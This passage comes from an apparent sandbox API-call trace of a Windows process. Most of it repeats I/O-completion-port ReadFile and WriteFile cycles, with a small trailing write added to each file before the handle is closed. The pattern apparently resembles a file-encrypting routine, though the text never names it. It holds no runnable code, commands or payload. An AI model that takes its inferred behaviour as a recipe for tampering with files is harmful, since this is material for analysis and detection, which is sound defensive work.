lpOverlapped=0x41eff4c) returned 1 [0148.691] CloseHandle (hObject=0x64c) returned 1 [0148.692] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4af0020) returned 1 [0148.693] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.693] CloseHandle (hObject=0x634) returned 1 [0148.693] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4c10020) returned 1 [0148.694] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.694] CloseHandle (hObject=0x638) returned 1 [0148.695] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4d30020) returned 1 [0148.695] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.695] CloseHandle (hObject=0x1a8) returned 1 [0148.696] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4e50020) returned 1 [0148.697] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0148.697] CloseHandle (hObject=0x614) returned 1 [0148.720] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4f70020) returned 1 [0148.720] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0149.028] CloseHandle (hObject=0x368) returned 1 [0149.055] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4670020) returned 1 [0149.056] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0149.056] CloseHandle (hObject=0x638) returned 1 [0149.067] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x49d0020) returned 1 [0149.068] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0150.810] WriteFile (in: hFile=0x65c, lpBuffer=0x49d0124*, nNumberOfBytesToWrite=0x156ae, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x49d0020) returned 1 [0150.818] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0150.818] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x48b0020) returned 1 [0150.818] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0150.818] WriteFile (in: hFile=0x640, lpBuffer=0x4670094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4670020 | out: lpBuffer=0x4670094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4670020) returned 1 [0150.827] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0150.831] CloseHandle (hObject=0x640) returned 1 [0150.845] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4670020) returned 1 [0150.845] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0150.845] CloseHandle (hObject=0x65c) returned 1 [0150.853] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x49d0020) returned 1 [0150.854] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0150.930] WriteFile (in: hFile=0x67c, lpBuffer=0x4280124*, nNumberOfBytesToWrite=0xfb33, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4280020) returned 1 [0151.078] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0151.078] ReadFile (in: hFile=0x67c, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4280020) returned 0x0 [0151.078] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0151.078] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0151.078] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0151.078] WriteFile (in: hFile=0x67c, lpBuffer=0x4280094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4280020 | out: lpBuffer=0x4280094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4280020) returned 1 [0151.099] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0151.099] CloseHandle (hObject=0x67c) returned 1 [0151.104] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4280020) returned 1 [0151.104] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0151.198] WriteFile (in: hFile=0x670, lpBuffer=0x4670124*, nNumberOfBytesToWrite=0x14c2, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4670020) returned 1 [0151.290] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0151.290] ReadFile (in: hFile=0x670, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4670020) returned 0x0 [0151.290] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0151.290] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0151.290] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0151.290] WriteFile (in: hFile=0x670, lpBuffer=0x4670094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4670020 | out: lpBuffer=0x4670094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4670020) returned 1 [0151.310] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0151.310] CloseHandle (hObject=0x670) returned 1 [0151.316] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4670020) returned 1 [0151.317] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0151.378] ReadFile (in: hFile=0x134, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x2f30020) returned 1 [0151.379] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0151.379] WriteFile (in: hFile=0x134, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0x15c01, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x2f30020) returned 1 [0151.379] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0151.379] ReadFile (in: hFile=0x134, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0151.379] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0151.379] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0151.379] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0151.380] WriteFile (in: hFile=0x134, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x2f30020) returned 1 [0151.380] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0151.380] CloseHandle (hObject=0x134) returned 1 [0151.393] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0151.393] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0155.382] ReadFile (in: hFile=0x680, lpBuffer=0x2880124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x2880020 | out: lpBuffer=0x2880124*, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x2880020) returned 1 [0155.383] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0155.452] WriteFile (in: hFile=0x680, lpBuffer=0x2880124*, nNumberOfBytesToWrite=0xac04, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x2880020 | out: lpBuffer=0x2880124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x2880020) returned 1 [0155.494] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0155.494] ReadFile (in: hFile=0x674, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4280020) returned 1 [0155.494] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0155.494] WriteFile (in: hFile=0x670, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0x154af, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x2f30020) returned 1 [0155.513] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0155.513] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2880020) returned 1 [0155.513] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0155.513] WriteFile (in: hFile=0x658, lpBuffer=0x4700124*, nNumberOfBytesToWrite=0xff1b, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4700020) returned 1 [0155.516] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0155.517] ReadFile (in: hFile=0x658, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4700020) returned 0x0 [0155.517] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0155.517] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0155.517] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0155.517] WriteFile (in: hFile=0x658, lpBuffer=0x4700094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4700020 | out: lpBuffer=0x4700094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4700020) returned 1 [0155.523] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0155.523] CloseHandle (hObject=0x658) returned 1 [0155.529] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4700020) returned 1 [0155.529] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0155.562] ReadFile (in: hFile=0x1a8, lpBuffer=0x2910124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x2910020 | out: lpBuffer=0x2910124*, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x2910020) returned 1 [0155.563] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0155.564] WriteFile (in: hFile=0x1a8, lpBuffer=0x2910124*, nNumberOfBytesToWrite=0xce03, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x2910020 | out: lpBuffer=0x2910124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x2910020) returned 1 [0155.577] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0155.577] ReadFile (in: hFile=0x1a8, lpBuffer=0x2910124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x2910020 | out: lpBuffer=0x2910124, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x2910020) returned 0x0 [0155.577] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0155.577] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2910020) returned 1 [0155.578] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0155.578] WriteFile (in: hFile=0x1a8, lpBuffer=0x2910094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x2910020 | out: lpBuffer=0x2910094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x2910020) returned 1 [0155.580] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0155.580] CloseHandle (hObject=0x1a8) returned 1 [0155.583] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2910020) returned 1 [0155.584] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0155.660] ReadFile (in: hFile=0x1a8, lpBuffer=0x2880124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x2880020 | out: lpBuffer=0x2880124*, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x2880020) returned 1 [0155.712] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0155.712] ReadFile (in: hFile=0x680, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x2f30020) returned 1 [0155.819] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0155.820] ReadFile (in: hFile=0x670, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4280020) returned 1 [0155.907] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0155.963] WriteFile (in: hFile=0x1a8, lpBuffer=0x2880124*, nNumberOfBytesToWrite=0x17da1, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x2880020 | out: lpBuffer=0x2880124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x2880020) returned 1 [0155.996] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0155.996] ReadFile (in: hFile=0x610, lpBuffer=0x4820124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124*, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4820020) returned 1 [0155.996] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0155.997] ReadFile (in: hFile=0x618, lpBuffer=0x4940124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124*, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4940020) returned 1 [0155.997] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0155.997] WriteFile (in: hFile=0x680, lpBuffer=0x2f30124, nNumberOfBytesToWrite=0x6d85, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x2f30020) returned 0x0 [0156.001] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0156.002] WriteFile (in: hFile=0x670, lpBuffer=0x4280124, nNumberOfBytesToWrite=0x11b06, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4280020) returned 0x0 [0156.007] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, 